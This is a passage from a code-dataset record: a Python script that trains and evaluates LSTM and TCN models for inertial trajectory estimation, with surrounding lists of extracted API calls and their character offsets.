2}, {'position': (350, 200), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (450, 0), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (450, 50), 'angle': 0.0, 'speed': \n 0, 'size': 2}, {'position': (450, 100), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 150), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (450, 200), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 600), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 600), 'angle': 0.0, 'speed': 0, 'size': 2}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='scenario_2_still_corridors', asteroid_states=[{'position': (\n 0, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (50, 250),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 250), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (150, 250), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (200, 250), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (250, 250), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (300, 250), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (350, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (0, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (50, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 350\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (150, 350),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (200, 350), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (250, 350), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (300, 350), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (350, 350), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 250), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (500, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 0), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (350, 50), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 100\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 150),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 200), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (450, 0), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (450, 50), 'angle': 0.0, 'speed': \n 0, 'size': 2}, {'position': (450, 100), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 150), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (450, 200), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 600), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 600), 'angle': 0.0, 'speed': 0, 'size': 2}],\n ship_state={'position': (400, 300)}, seed=0)\n", (38030, 41761), False, 'from fuzzy_asteroids.util import Scenario\n'), ((6500, 6529), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (6511, 6529), True, 'import numpy as np\n'), ((7042, 7071), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (7053, 7071), True, 'import numpy as np\n'), ((7585, 7614), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (7596, 7614), True, 'import numpy as np\n'), ((8112, 8141), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (8123, 8141), True, 'import numpy as np\n'), ((8662, 8691), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (8673, 8691), True, 'import numpy as np\n'), ((6548, 6561), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (6554, 6561), True, 'import numpy as np\n'), ((6601, 6614), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (6607, 6614), True, 'import numpy as np\n'), ((7091, 7112), 'numpy.cos', 'np.cos', (['(angle + np.pi)'], {}), '(angle + np.pi)\n', (7097, 7112), True, 'import numpy as np\n'), ((7152, 7173), 'numpy.sin', 'np.sin', (['(angle + np.pi)'], {}), '(angle + np.pi)\n', (7158, 7173), True, 'import numpy as np\n'), ((7634, 7647), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (7640, 7647), True, 'import numpy as np\n'), ((7687, 7700), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (7693, 7700), True, 'import numpy as np\n'), ((8161, 8186), 'numpy.cos', 'np.cos', (['(angle + np.pi / 2)'], {}), '(angle + np.pi / 2)\n', (8167, 8186), True, 'import numpy as np\n'), ((8226, 8251), 'numpy.sin', 'np.sin', (['(angle + np.pi / 2)'], {}), '(angle + np.pi / 2)\n', (8232, 8251), True, 'import numpy as np\n'), ((8711, 8740), 'numpy.cos', 'np.cos', (['(angle + 3 * np.pi / 2)'], {}), '(angle + 3 * np.pi / 2)\n', (8717, 8740), True, 'import numpy as np\n'), ((8780, 8809), 'numpy.sin', 'np.sin', (['(angle + 3 * np.pi / 2)'], {}), '(angle + 3 * np.pi / 2)\n', (8786, 8809), True, 'import numpy as np\n')]
|
import json
import os
import sys
import time
from os import path as osp
from pathlib import Path
from shutil import copyfile
import numpy as np
import torch
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import DataLoader
from tqdm import tqdm
from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork
from utils import load_config, MSEAverageMeter
from data_glob_speed import GlobSpeedSequence, SequenceToSequenceDataset, SenseINSSequence
from transformations import ComposeTransform, RandomHoriRotateSeq
from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error
def WriteList(path, name, folders):
with open(path+"/"+name, 'w') as f:
for folder in folders:
f.writelines(folder+"\n")
f.close()
def GetFolderName(path):
names = os.listdir(path+"/")
folders=[]
for name in names:
if os.path.isdir(os.path.join(os.path.abspath(path), name)):
folders.append(name)
folders.sort()
return folders
'''
Temporal models with loss functions in global coordinate frame
Configurations
- Model types
TCN - type=tcn
LSTM_simple - type=lstm, lstm_bilinear
'''
torch.multiprocessing.set_sharing_strategy('file_system')
_nano_to_sec = 1e09
_input_channel, _output_channel = 6, 3
# _input_channel, _output_channel = 6, 2
device = 'cpu'
class GlobalPosLoss(torch.nn.Module):
def __init__(self, mode='full', history=None):
"""
Calculate position loss in global coordinate frame
Target :- Global Velocity
Prediction :- Global Velocity
"""
super(GlobalPosLoss, self).__init__()
self.mse_loss = torch.nn.MSELoss(reduction='none')
assert mode in ['full', 'part']
self.mode = mode
if self.mode == 'part':
assert history is not None
self.history = history
elif self.mode == 'full':
self.history = 1
def forward(self, pred, targ):
gt_pos = torch.cumsum(targ[:, 1:, ], 1)
pred_pos = torch.cumsum(pred[:, 1:, ], 1)
if self.mode == 'part':
gt_pos = gt_pos[:, self.history:, :] - gt_pos[:, :-self.history, :]
pred_pos = pred_pos[:, self.history:, :] - pred_pos[:, :-self.history, :]
loss = self.mse_loss(pred_pos, gt_pos)
return torch.mean(loss)
def write_config(args, **kwargs):
if args.out_dir:
with open(osp.join(args.out_dir, 'config.json'), 'w') as f:
values = vars(args)
values['file'] = "pytorch_global_position"
if kwargs:
values['kwargs'] = kwargs
json.dump(values, f, sort_keys=True)
def get_dataset(root_dir, data_list, args, **kwargs):
input_format, output_format = [0, 3, 6], [0, _output_channel]
mode = kwargs.get('mode', 'train')
random_shift, shuffle, transforms, grv_only = 0, False, [], False
if mode == 'train':
random_shift = args.step_size // 2
shuffle = True
transforms.append(RandomHoriRotateSeq(input_format, output_format))
elif mode == 'val':
shuffle = True
elif mode == 'test':
shuffle = False
grv_only = True
transforms = ComposeTransform(transforms)
if args.dataset == 'ronin':
seq_type = GlobSpeedSequence
elif args.dataset == 'ridi':
from data_ridi import RIDIGlobSpeedSequence
seq_type = RIDIGlobSpeedSequence
elif args.dataset == 'sense':
seq_type = SenseINSSequence
dataset = SequenceToSequenceDataset(seq_type, root_dir, data_list, args.cache_path, args.step_size, args.window_size,
random_shift=random_shift, transform=transforms, shuffle=shuffle,
grv_only=grv_only, args=args, **kwargs)
return dataset
def get_dataset_from_list(root_dir, list_path, args, **kwargs):
with open(list_path) as f:
data_list = [s.strip().split(',')[0] for s in f.readlines() if len(s) > 0 and s[0] != '#']
return get_dataset(root_dir, data_list, args, **kwargs)
def get_model(args, **kwargs):
config = {}
if kwargs.get('dropout'):
config['dropout'] = kwargs.get('dropout')
if args.type == 'tcn':
network = TCNSeqNetwork(_input_channel, _output_channel, args.kernel_size,
layer_channels=args.channels, **config)
print("TCN Network. Receptive field: {} ".format(network.get_receptive_field()))
elif args.type == 'lstm_bi':
print("Bilinear LSTM Network")
network = BilinearLSTMSeqNetwork(_input_channel, _output_channel, args.batch_size, device,
lstm_layers=args.layers, lstm_size=args.layer_size, **config).to(device)
else:
print("Simple LSTM Network")
network = LSTMSeqNetwork(_input_channel, _output_channel, args.batch_size, device,
lstm_layers=args.layers, lstm_size=args.layer_size, **config).to(device)
pytorch_total_params = sum(p.numel() for p in network.parameters() if p.requires_grad)
print('Network constructed. trainable parameters: {}'.format(pytorch_total_params))
return network
def get_loss_function(history, args, **kwargs):
if args.type == 'tcn':
config = {'mode': 'part',
'history': history}
else:
config = {'mode': 'full'}
criterion = GlobalPosLoss(**config)
return criterion
def format_string(*argv, sep=' '):
result = ''
for val in argv:
if isinstance(val, (tuple, list, np.ndarray)):
for v in val:
result += format_string(v, sep=sep) + sep
else:
result += str(val) + sep
return result[:-1]
def train(args, **kwargs):
# Loading data
start_t = time.time()
train_dataset = get_dataset_from_list(args.root_dir, args.train_list, args, mode='train', **kwargs)
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.num_workers, shuffle=True,
drop_last=True)
end_t = time.time()
print('Training set loaded. Time usage: {:.3f}s'.format(end_t - start_t))
val_dataset, val_loader = None, None
if args.val_list is not None:
val_dataset = get_dataset_from_list(args.validation_dir, args.val_list, args, mode='val', **kwargs)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True)
print('Validation set loaded')
global device
device = torch.device(args.device if torch.cuda.is_available() else 'cpu')
if args.out_dir:
if not osp.isdir(args.out_dir):
os.makedirs(args.out_dir)
if not osp.isdir(osp.join(args.out_dir, 'checkpoints')):
os.makedirs(osp.join(args.out_dir, 'checkpoints'))
if not osp.isdir(osp.join(args.out_dir, 'logs')):
os.makedirs(osp.join(args.out_dir, 'logs'))
write_config(args, **kwargs)
print('\nNumber of train samples: {}'.format(len(train_dataset)))
train_mini_batches = len(train_loader)
if val_dataset:
print('Number of val samples: {}'.format(len(val_dataset)))
val_mini_batches = len(val_loader)
network = get_model(args, **kwargs).to(device)
history = network.get_receptive_field() if args.type == 'tcn' else args.window_size // 2
criterion = get_loss_function(history, args, **kwargs)
optimizer = torch.optim.Adam(network.parameters(), args.lr)
scheduler = ReduceLROnPlateau(optimizer, 'min', patience=10, factor=0.75, verbose=True, eps=1e-12)
quiet_mode = kwargs.get('quiet', False)
use_scheduler = kwargs.get('use_scheduler', False)
log_file = None
if args.out_dir:
log_file = osp.join(args.out_dir, 'logs', 'log.txt')
if osp.exists(log_file):
if args.continue_from is None:
os.remove(log_file)
else:
copyfile(log_file, osp.join(args.out_dir, 'logs', 'log_old.txt'))
start_epoch = 0
if args.continue_from is not None and osp.exists(args.continue_from):
with open(osp.join(str(Path(args.continue_from).parents[1]), 'config.json'), 'r') as f:
model_data = json.load(f)
if device.type == 'cpu':
checkpoints = torch.load(args.continue_from, map_location=lambda storage, location: storage)
else:
checkpoints = torch.load(args.continue_from, map_location={model_data['device']: args.device})
start_epoch = checkpoints.get('epoch', 0)
network.load_state_dict(checkpoints.get('model_state_dict'))
optimizer.load_state_dict(checkpoints.get('optimizer_state_dict'))
if kwargs.get('force_lr', False):
for param_group in optimizer.param_groups:
param_group['lr'] = args.lr
step = 0
best_val_loss = np.inf
train_errs = np.zeros(args.epochs)
print("Starting from epoch {}".format(start_epoch
))
try:
for epoch in range(start_epoch, args.epochs):
log_line = ''
network.train()
train_vel = MSEAverageMeter(3, [2], _output_channel)
train_loss = 0
start_t = time.time()
for bid, batch in tqdm(enumerate(train_loader)):
feat, targ, _, _ = batch
feat, targ = feat.to(device), targ.to(device)
optimizer.zero_grad()
predicted = network(feat)
train_vel.add(predicted.cpu().detach().numpy(), targ.cpu().detach().numpy())
loss = criterion(predicted, targ)
train_loss += loss.cpu().detach().numpy()
loss.backward()
optimizer.step()
step += 1
train_errs[epoch] = train_loss / train_mini_batches
end_t = time.time()
if not quiet_mode:
print('-' * 25)
print('Epoch {}, time usage: {:.3f}s, loss: {}, val_loss {}/{:.6f}'.format(
epoch, end_t - start_t, train_errs[epoch], train_vel.get_channel_avg(), train_vel.get_total_avg()))
print('Learning rate: {}'.format(optimizer.param_groups[0]['lr']))
log_line = format_string(log_line, epoch, optimizer.param_groups[0]['lr'], train_errs[epoch],
*train_vel.get_channel_avg())
saved_model = False
if val_loader:
network.eval()
val_vel = MSEAverageMeter(3, [2], _output_channel)
val_loss = 0
for bid, batch in tqdm(enumerate(val_loader)):
feat, targ, _, _ = batch
feat, targ = feat.to(device), targ.to(device)
optimizer.zero_grad()
pred = network(feat)
val_vel.add(pred.cpu().detach().numpy(), targ.cpu().detach().numpy())
val_loss += criterion(pred, targ).cpu().detach().numpy()
val_loss = val_loss / val_mini_batches
log_line = format_string(log_line, val_loss, *val_vel.get_channel_avg())
if not quiet_mode:
print('Validation loss: {} val_loss: {}/{:.6f}'.format(val_loss, val_vel.get_channel_avg(),
val_vel.get_total_avg()))
if val_loss < best_val_loss:
best_val_loss = val_loss
saved_model = True
if args.out_dir:
model_path = osp.join(args.out_dir, 'checkpoints', 'checkpoint_%d.pt' % epoch)
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'loss': train_errs[epoch],
'optimizer_state_dict': optimizer.state_dict()}, model_path)
print('Best Validation Model saved to ', model_path)
scheduler.step(val_loss)
if args.out_dir and not saved_model and (epoch + 1) % args.save_interval == 0: # save even with validation
model_path = osp.join(args.out_dir, 'checkpoints', 'icheckpoint_%d.pt' % epoch)
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'loss': train_errs[epoch],
'optimizer_state_dict': optimizer.state_dict()}, model_path)
print('Model saved to ', model_path)
if log_file:
log_line += '\n'
with open(log_file, 'a') as f:
f.write(log_line)
if np.isnan(train_loss):
print("Invalid value. Stopping training.")
break
except KeyboardInterrupt:
print('-' * 60)
print('Early terminate')
print('Training completed')
if args.out_dir:
model_path = osp.join(args.out_dir, 'checkpoints', 'checkpoint_latest.pt')
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'optimizer_state_dict': optimizer.state_dict()}, model_path)
def recon_traj_with_preds_global(dataset, preds, ind=None, seq_id=0, type='preds', **kwargs):
ind = ind if ind is not None else np.array([i[1] for i in dataset.index_map if i[0] == seq_id], dtype=np.int)
if type == 'gt':
# pos = dataset.gt_pos[seq_id][:, :2]
pos = dataset.gt_pos[seq_id][:, :3]
else:
ts = dataset.ts[seq_id]
# Compute the global velocity from local velocity.
dts = np.mean(ts[ind[1:]] - ts[ind[:-1]])
pos = preds * dts
# pos[0, :] = dataset.gt_pos[seq_id][0, :2]
pos[0, :] = dataset.gt_pos[seq_id][0, :3]
pos = np.cumsum(pos, axis=0)
veloc = preds
ori = dataset.orientations[seq_id]
return pos, veloc, ori
def test(args, **kwargs):
global device, _output_channel
import matplotlib.pyplot as plt
device = torch.device(args.device if torch.cuda.is_available() else 'cpu')
if args.test_path is not None:
if args.test_path[-1] == '/':
args.test_path = args.test_path[:-1]
root_dir = osp.split(args.test_path)[0]
test_data_list = [osp.split(args.test_path)[1]]
elif args.test_list is not None:
root_dir = args.root_dir if args.root_dir else osp.split(args.test_list)[0]
with open(args.test_list) as f:
test_data_list = [s.strip().split(',')[0] for s in f.readlines() if len(s) > 0 and s[0] != '#']
else:
raise ValueError('Either test_path or test_list must be specified.')
# Load the first sequence to update the input and output size
_ = get_dataset(root_dir, [test_data_list[0]], args, mode='test')
if args.out_dir and not osp.exists(args.out_dir):
os.makedirs(args.out_dir)
with open(osp.join(str(Path(args.model_path).parents[1]), 'config.json'), 'r') as f:
model_data = json.load(f)
if device.type == 'cpu':
checkpoint = torch.load(args.model_path, map_location=lambda storage, location: storage)
else:
checkpoint = torch.load(args.model_path, map_location={model_data['device']: args.device})
network = get_model(args, **kwargs)
network.load_state_dict(checkpoint.get('model_state_dict'))
network.eval().to(device)
print('Model {} loaded to device {}.'.format(args.model_path, device))
log_file = None
if args.test_list and args.out_dir:
log_file = osp.join(args.out_dir, osp.split(args.test_list)[-1].split('.')[0] + '_log.txt')
with open(log_file, 'w') as f:
f.write(args.model_path + '\n')
f.write('Seq traj_len velocity ate rte\n')
losses_vel = MSEAverageMeter(2, [1], _output_channel)
ate_all, rte_all = [], []
pred_per_min = 200 * 60
seq_dataset = get_dataset(root_dir, test_data_list, args, mode='test', **kwargs)
for idx, data in enumerate(test_data_list):
assert data == osp.split(seq_dataset.data_path[idx])[1]
feat, vel = seq_dataset.get_test_seq(idx)
feat = torch.Tensor(feat).to(device)
preds = np.squeeze(network(feat).cpu().detach().numpy())[-vel.shape[0]:, :_output_channel]
ind = np.arange(vel.shape[0])
val_losses = np.mean((vel - preds) ** 2, axis=0)
losses_vel.add(vel, preds)
print('Reconstructing trajectory')
pos_pred, gv_pred, _ = recon_traj_with_preds_global(seq_dataset, preds, ind=ind, type='pred', seq_id=idx)
pos_gt, gv_gt, _ = recon_traj_with_preds_global(seq_dataset, vel, ind=ind, type='gt', seq_id=idx)
if args.out_dir is not None and osp.isdir(args.out_dir):
np.save(osp.join(args.out_dir, '{}_{}.npy'.format(data, args.type)),
np.concatenate([pos_pred, pos_gt], axis=1))
ate = compute_absolute_trajectory_error(pos_pred, pos_gt)
if pos_pred.shape[0] < pred_per_min:
ratio = pred_per_min / pos_pred.shape[0]
rte = compute_relative_trajectory_error(pos_pred, pos_gt, delta=pos_pred.shape[0] - 1) * ratio
else:
rte = compute_relative_trajectory_error(pos_pred, pos_gt, delta=pred_per_min)
pos_cum_error = np.linalg.norm(pos_pred - pos_gt, axis=1)
ate_all.append(ate)
rte_all.append(rte)
print('Sequence {}, Velocity loss {} / {}, ATE: {}, RTE:{}'.format(data, val_losses, np.mean(val_losses), ate,
rte))
log_line = format_string(data, np.mean(val_losses), ate, rte)
if not args.fast_test:
kp = preds.shape[1]
if kp == 2:
targ_names = ['vx', 'vy']
elif kp == 3:
targ_names = ['vx', 'vy', 'vz']
plt.figure('{}'.format(data), figsize=(16, 9))
plt.subplot2grid((kp, 2), (0, 0), rowspan=kp - 1)
plt.plot(pos_pred[:, 0], pos_pred[:, 1])
plt.plot(pos_gt[:, 0], pos_gt[:, 1])
plt.title(data)
plt.axis('equal')
plt.legend(['Predicted', 'Ground truth'])
plt.subplot2grid((kp, 2), (kp - 1, 0))
plt.plot(pos_cum_error)
plt.legend(['ATE:{:.3f}, RTE:{:.3f}'.format(ate_all[-1], rte_all[-1])])
for i in range(kp):
plt.subplot2grid((kp, 2), (i, 1))
plt.plot(ind, preds[:, i])
plt.plot(ind, vel[:, i])
plt.legend(['Predicted', 'Ground truth'])
plt.title('{}, error: {:.6f}'.format(targ_names[i], val_losses[i]))
plt.tight_layout()
if args.show_plot:
plt.show()
if args.out_dir is not None and osp.isdir(args.out_dir):
plt.savefig(osp.join(args.out_dir, '{}_{}.png'.format(data, args.type)))
if log_file is not None:
with open(log_file, 'a') as f:
log_line += '\n'
f.write(log_line)
plt.close('all')
ate_all = np.array(ate_all)
rte_all = np.array(rte_all)
measure = format_string('ATE', 'RTE', sep='\t')
values = format_string(np.mean(ate_all), np.mean(rte_all), sep='\t')
print(measure, '\n', values)
if log_file is not None:
with open(log_file, 'a') as f:
f.write(measure + '\n')
f.write(values)
if __name__ == '__main__':
"""
Run file with individual arguments or/and config file. If argument appears in both config file and args,
args is given precedence.
"""
default_config_file = osp.abspath(osp.join(osp.abspath(__file__), '../../config/temporal_model_defaults.json'))
import argparse
parser = argparse.ArgumentParser(description="Run seq2seq model in train/test mode [required]. Optional "
"configurations can be specified as --key [value..] pairs",
add_help=True)
parser.add_argument('--config', type=str, help='Configuration file [Default: {}]'.format(default_config_file),
default=default_config_file)
# common
parser.add_argument('--type', type=str, choices=['tcn', 'lstm', 'lstm_bi'], help='Model type', default='lstm')
parser.add_argument('--root_dir', type=str, default="/data/INSData/ins_data_test/IDOL_SenseINS/building1/train_debug", help='Path to data directory')
parser.add_argument('--validation_dir', type=str, default="/data/INSData/ins_data_test/IDOL_SenseINS/building1/train_debug")
# parser.add_argument('--root_dir', type=str,
# default="/home/SENSETIME/xurunsen/project/ronin/RONIN/train_debug",
# help='Path to data directory')
# parser.add_argument('--validation_dir', type=str,
# default="/home/SENSETIME/xurunsen/project/ronin/RONIN/train_debug")
parser.add_argument('--cache_path', type=str, default=None)
parser.add_argument('--feature_sigma', type=float, help='Gaussian for smoothing features')
parser.add_argument('--target_sigma', type=float, help='Gaussian for smoothing target')
parser.add_argument('--window_size', type=int)
parser.add_argument('--step_size', type=int)
parser.add_argument('--batch_size', type=int)
parser.add_argument('--num_workers', type=int)
parser.add_argument('--out_dir', type=str, default='../output/ronin_lstm/idol/2021.05.14/train_debug')
parser.add_argument('--device', type=str, help='Cuda device (e.g:- cuda:0) or cpu')
parser.add_argument('--dataset', type=str, choices=['ronin', 'ridi', 'sense'], default='sense')
parser.add_argument('--imu_freq', type=int, default=200)
# tcn
tcn_cmd = parser.add_argument_group('tcn', 'configuration for TCN')
tcn_cmd.add_argument('--kernel_size', type=int)
tcn_cmd.add_argument('--channels', type=str, help='Channel sizes for TCN layers (comma separated)')
# lstm
lstm_cmd = parser.add_argument_group('lstm', 'configuration for LSTM')
lstm_cmd.add_argument('--layers', type=int)
lstm_cmd.add_argument('--layer_size', type=int)
mode = parser.add_subparsers(title='mode', dest='mode', help='Operation: [train] train model, [test] evaluate model')
mode.required = False
# train
train_cmd = mode.add_parser('train')
train_cmd.add_argument('--train_list', type=str)
train_cmd.add_argument('--val_list', type=str)
train_cmd.add_argument('--continue_from', type=str, default=None)
train_cmd.add_argument('--epochs', type=int)
train_cmd.add_argument('--save_interval', type=int)
train_cmd.add_argument('--lr', '--learning_rate', type=float)
# test
test_cmd = mode.add_parser('test')
test_cmd.add_argument('--test_path', type=str, default=None)
test_cmd.add_argument('--test_list', type=str, default=None)
test_cmd.add_argument('--model_path', type=str, default='/home/SENSETIME/xurunsen/project/ronin/output/ronin_lstm/idol/2021.05.14/train_debug/checkpoints/checkpoint_714.pt')
test_cmd.add_argument('--fast_test', action='store_true')
test_cmd.add_argument('--show_plot', action='store_true')
'''
Extra arguments
Set True: use_scheduler,
quite (no output on stdout),
force_lr (force lr when a model is loaded from continue_from)
float: dropout,
max_ori_error (err. threshold for priority grv in degrees)
max_velocity_norm (filter outliers in training)
'''
args, unknown_args = parser.parse_known_args()
np.set_printoptions(formatter={'all': lambda x: '{:.6f}'.format(x)})
args, kwargs = load_config(default_config_file, args, unknown_args)
print(args, kwargs)
# add by runsen
# write list
if args.mode == "train":
if args.train_list is None:
WriteList(args.root_dir, "train_list.txt", GetFolderName(args.root_dir))
args.train_list = args.root_dir + "/train_list.txt"
if args.validation_dir is not None:
WriteList(args.validation_dir, "validation_list.txt", GetFolderName(args.validation_dir))
args.val_list = args.validation_dir + "/validation_list.txt"
elif args.mode == "test":
if args.test_list is None:
WriteList(args.root_dir, "test_list.txt", GetFolderName(args.root_dir))
args.test_list = args.root_dir + "/test_list.txt"
if args.mode == 'train':
train(args, **kwargs)
elif args.mode == 'test':
if not args.model_path:
raise ValueError("Model path required")
args.batch_size = 1
test(args, **kwargs)
|
[
"model_temporal.BilinearLSTMSeqNetwork",
"model_temporal.LSTMSeqNetwork",
"utils.MSEAverageMeter",
"numpy.array",
"torch.nn.MSELoss",
"model_temporal.TCNSeqNetwork",
"torch.cuda.is_available",
"numpy.linalg.norm",
"metric.compute_absolute_trajectory_error",
"numpy.arange",
"os.remove",
"os.path.exists",
"numpy.mean",
"os.listdir",
"argparse.ArgumentParser",
"pathlib.Path",
"torch.mean",
"matplotlib.pyplot.plot",
"torch.multiprocessing.set_sharing_strategy",
"matplotlib.pyplot.close",
"os.path.split",
"os.path.isdir",
"utils.load_config",
"numpy.concatenate",
"matplotlib.pyplot.axis",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"data_glob_speed.SequenceToSequenceDataset",
"transformations.RandomHoriRotateSeq",
"metric.compute_relative_trajectory_error",
"torch.Tensor",
"numpy.isnan",
"matplotlib.pyplot.title",
"time.time",
"torch.cumsum",
"matplotlib.pyplot.legend",
"os.path.abspath",
"matplotlib.pyplot.show",
"os.makedirs",
"transformations.ComposeTransform",
"torch.load",
"os.path.join",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"torch.utils.data.DataLoader",
"json.load",
"numpy.cumsum",
"matplotlib.pyplot.subplot2grid",
"json.dump"
] |
[((1238, 1295), 'torch.multiprocessing.set_sharing_strategy', 'torch.multiprocessing.set_sharing_strategy', (['"""file_system"""'], {}), "('file_system')\n", (1280, 1295), False, 'import torch\n'), ((853, 875), 'os.listdir', 'os.listdir', (["(path + '/')"], {}), "(path + '/')\n", (863, 875), False, 'import os\n'), ((3270, 3298), 'transformations.ComposeTransform', 'ComposeTransform', (['transforms'], {}), '(transforms)\n', (3286, 3298), False, 'from transformations import ComposeTransform, RandomHoriRotateSeq\n'), ((3579, 3801), 'data_glob_speed.SequenceToSequenceDataset', 'SequenceToSequenceDataset', (['seq_type', 'root_dir', 'data_list', 'args.cache_path', 'args.step_size', 'args.window_size'], {'random_shift': 'random_shift', 'transform': 'transforms', 'shuffle': 'shuffle', 'grv_only': 'grv_only', 'args': 'args'}), '(seq_type, root_dir, data_list, args.cache_path,\n args.step_size, args.window_size, random_shift=random_shift, transform=\n transforms, shuffle=shuffle, grv_only=grv_only, args=args, **kwargs)\n', (3604, 3801), False, 'from data_glob_speed import GlobSpeedSequence, SequenceToSequenceDataset, SenseINSSequence\n'), ((5882, 5893), 'time.time', 'time.time', ([], {}), '()\n', (5891, 5893), False, 'import time\n'), ((6017, 6135), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'num_workers': 'args.num_workers', 'shuffle': '(True)', 'drop_last': '(True)'}), '(train_dataset, batch_size=args.batch_size, num_workers=args.\n num_workers, shuffle=True, drop_last=True)\n', (6027, 6135), False, 'from torch.utils.data import DataLoader\n'), ((6173, 6184), 'time.time', 'time.time', ([], {}), '()\n', (6182, 6184), False, 'import 